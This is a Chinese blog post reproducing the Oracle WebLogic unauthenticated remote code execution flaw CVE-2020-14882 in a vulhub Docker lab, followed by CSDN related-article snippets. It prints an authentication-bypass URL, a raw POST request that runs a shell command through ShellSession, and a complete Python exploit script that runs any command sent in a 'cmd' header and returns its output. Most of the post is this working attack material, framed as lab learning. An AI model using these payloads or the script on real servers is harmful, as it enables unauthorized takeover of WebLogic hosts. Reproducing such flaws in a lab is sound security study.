weblogic未授权命令执行漏洞(CVE-2020-14882)复现

最新推荐文章于 2024-07-10 10:00:00 发布
最新推荐文章于 2024-07-10 10:00:00 发布
阅读量3.3k 收藏 6
点赞数 2
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45291045/article/details/115381481
版权

文章目录

漏洞概述

未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。

漏洞影响范围

Oracle Weblogic Server 10.3.6.0.0
Oracle Weblogic Server 12.1.3.0.0
Oracle Weblogic Server 12.2.1.3.0
Oracle Weblogic Server 12.2.1.4.0
Oracle Weblogic Server 14.1.1.0.0

环境搭建

使用vulhub靶场
搭建vulhub靶场参考文章:vulhub

进到vulhub目录

cd vulhub
cd weblogic/
cd CVE-2020-14882/

运行靶场

docker-compose up -d

在这里插入图片描述
查看启动环境

docker-compose ps

在这里插入图片描述

复现完成后移除环境

docker-compose down

漏洞复现

访问http://192.168.19.129:7001/console
出现登录页面证明搭建成功

在这里插入图片描述构造poc未授权访问后台地址

http://127.0.0.1:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29

在这里插入图片描述
抓包构造POC写入文件

POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
Host: 192.168.19.129:7001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 138

_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/123.txt');")

在这里插入图片描述
进入搭建的服务器容器查看文件是否写入

docker ps
docker exec -it e3fec34c620d bash
cd /tmp
ls

文件已经被写入
在这里插入图片描述

利用工具

地址:https://github.com/GGyao/CVE-2020-14882_ALL

利用脚本

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# author: zhzyker
# from: https://github.com/zhzyker/vulmap
# from: https://github.com/zhzyker/exphub
import http.client
import requests
import sys
import argparse
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'

payload_cve_2020_14882_v12 = ('_nfpb=true&_pageLabel=&handle='
            'com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = '
            '(weblogic.work.ExecuteThread) Thread.currentThread(); weblogic.work.WorkAdapter adapter = '
            'executeThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField'
            '("connectionHandler"); field.setAccessible(true); Object obj = field.get(adapter); weblogic.servlet'
            '.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) '
            'obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd"); '
            'String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]'
            '{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd}; if (cmd != null) { String result '
            '= new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter'
            '("\\\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.'
            'ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req);'
            'res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));'
            'res.getServletOutputStream().flush(); res.getWriter().write(""); }executeThread.interrupt(); ");')

def cve_2020_14882(url, cmd):
    payload = payload_cve_2020_14882_v12
    path = "/console/css/%252e%252e%252fconsole.portal"
    headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,'
                  'application/signed-exchange;v=b3;q=0.9',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Connection': 'close',
        'Content-Type': 'application/x-www-form-urlencoded',
        'cmd': cmd
    }
    try:
        request = requests.post(url + path, data=payload, headers=headers, timeout=10, verify=False)
        print(request.text)
    except Exception as error:
        print("[-] Vuln Check Failed... ...")
        print("[-] More Weblogic vulnerabilities in https://github.com/zhzyker/vulmap")




if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Weblogic cve-2020-14882',
                                     usage='use "python %(prog)s --help" for more information',
                                     formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument("-u", "--url",
                        dest="url",
                        help="target url (http://192.168.19.129:7001/)"
                        )

    parser.add_argument("-c", "--cmd",
                        dest="cmd",
                        help="command"
                        )
    args = parser.parse_args()
    if not args.url or not args.cmd:
        sys.exit('[*] Please assign url and cmd! \n[*] Examples python cve-2020-14882_rce.py -u http://192.168.19.129:7001/ -c whoami')
    cve_2020_14882(args.url, args.cmd)

修改url
在这里插入图片描述

在这里插入图片描述

echo "大佬们吃饭了"
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
复现nuclei——CVE-2020-14882WebLogic远程代码执行漏洞
记录并分享学习安全的知识点..
01-21 2028
一、漏洞介绍 2020年10月28日,Oracle发布的10月安全更新中的Oracle WebLogic Server 远程代码执行漏洞CVE-2020-14882)POC被公开,远程攻击者可以通过发送恶意的HTTP GET 请求。成功利用此漏洞的攻击者可在经身份验证的情况下控制 WebLogic Server Console ,并执行任意代码。 二、影响版本 WebLogic 10.3.6.0.0 WebLogic 12.1.3.0.0 WebLogic 12.2.1.3.0 WebLo
WebLogic授权命令执行漏洞(CVE-2020-14882-14883)
m0_48520508的博客
11-10 8264
0x00简介 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 Weblogic对比Tomcat 0x01漏洞概述 CVE-2020-14882: 代码执行漏洞 远程攻击者可以构造特殊的HTTP请求,在经身份
weblogic漏洞复现学习
m0_64777251的博客
04-16 954
Oracle WebLogic Server 远程代码执行漏洞CVE-2020-14882)POC 被公开,经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。它们均存在于WebLogic的Console控制台组件中。此组件为WebLogic全版本默认自带组件,且该漏洞通过HTTP协议进行利用。
漏洞复现Weblogic授权命令执行漏洞CVE-2020-14882
weixin_43486390的博客
12-17 2014
CVE-2020-14882
Oracle WebLogic Server 安全漏洞(CVE-2020-14882)复现
2301_77132421的博客
07-05 753
攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码。
Weblogic授权访问漏洞-CVE-2020-14882&&CVE-2020-14883
weixin_51151498的博客
12-05 1592
weblogic漏洞复现
Weblogic 管理控制台授权远程命令执行漏洞CVE-2020-14882CVE-2020-14883)
最新发布
m0_68045701的博客
07-10 1501
2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882CVE-2020-14883。CVE-2020-14882允许授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。首先,我们需要构造一个XML文件,并将其保存在Weblogic可以访问到的服务器上,如。访问后台后是一个低权限的用户,无法安装应用,也无法直接执行任意代码。
CVE-2020-14882 weblogic授权远程命令执行漏洞
栉风沐雪的博客
02-22 4308
Oracle WebLogic Server 远程代码执行漏洞CVE-2020-14882)POC 被公开,经身份验证)的远程攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码,利用门槛低,危害巨大。Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。
CVE-2020-14882​&14883:Weblogic RCE复现1
08-03
声明:请勿用作违法用途,否则后果自负0x01 简介用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。0x02 漏洞概述编
MS08_067漏洞复现
weixin_45291045的博客
05-15 1988
原理 攻击者利用受害主机默认开放的SMB服务端口445,发送恶意资料到该端口,通过MSRPC接口调用server服务的一个函数,并破坏程序的栈缓冲区,获取远程代码执行的权限,从而完全控制主机 环境准备 攻击机kali 192.168.182.130 靶机 windows xp 中文版 192.168.182.129 靶机关闭防火墙,靶机需要在攻击机的网段中 端口扫描 使用nmap探测ip网段上存活的主机及开放的端口 nmap -sV -n 192.168.182.0/24 -sV表示扫描系统版本及服务信
锐捷RG-UAC同一上网行为管理(信息泄露漏洞复现)
weixin_45291045的博客
03-13 1731
构造url https://xxx.xxx.cn/get_dkey.php?user=admin 可看到该系统的超级管理员权限账号、访客权限账号 md5解密密码后即可登录
Thinkphp < 6.0.2 session id作过滤漏洞导致的任意写文件
weixin_45291045的博客
03-09 581
漏洞描述 2020年1月10日,ThinkPHP团队发布一个补丁更新,修复了一处由不安全的SessionId导致的任意文件操作漏洞.该漏洞允许攻击者在目标环境启用session的条件下创建任意文件以及删除任意文件,在特定情况下还可以getshell. 影响范围 ThinkPHP6.0.0-6.0.1 漏洞复现 这是一个ThinkPHP任意文件写入靶场 首先抓取数据包 构造数据包 /tp6/public/index.php?c=aaa<?php+phpinfo();+?> PHPSESSID长
通达OA 11.5 sql注入漏洞复现
weixin_45291045的博客
02-13 565
下载地址:https://cdndown.tongda2000.com/oa/2019/TDOA11.5.exe 1.登录一个账户 2.构造url http://192.168.1.1general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2,burp抓包 id参数存在延时注入 直接复制数据包,id参数加个*保存到sqlmap跑 python sqlmap.py -r 1.txt orderby参数 构
CVE-2020-14882
08-17
CVE-2020-14882是一种存在于Oracle WebLogic Server中的漏洞。通过构造特殊的HTTP请求,攻击者可以在经身份验证的情况下接管WebLogic Server Console,并执行任意代码。攻击者可以利用这个漏洞执行命令或者控制服务器。在攻击机中执行命令"python CVE-2020-14882_ALL.py -u http://192.168.248.183:7001 -c "ls""可以对靶机进行攻击,其中靶机的IP和端口需要替换为具体的值。另外,在攻击机中执行命令"python3 CVE-2020-14882_ALL.py -u http://target_mechine_ip:7001/ -x http://your_httpserver_ip:8000/poc.xml"可以利用这个漏洞进行权限绕过攻击。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [weblogic授权访问漏洞复现CVE-2020-14882)](https://blog.csdn.net/qq_32731075/article/details/117673410)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *3* [WebLogic授权命令执行漏洞(CVE-2020-14882-14883)](https://blog.csdn.net/m0_48520508/article/details/109592136)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值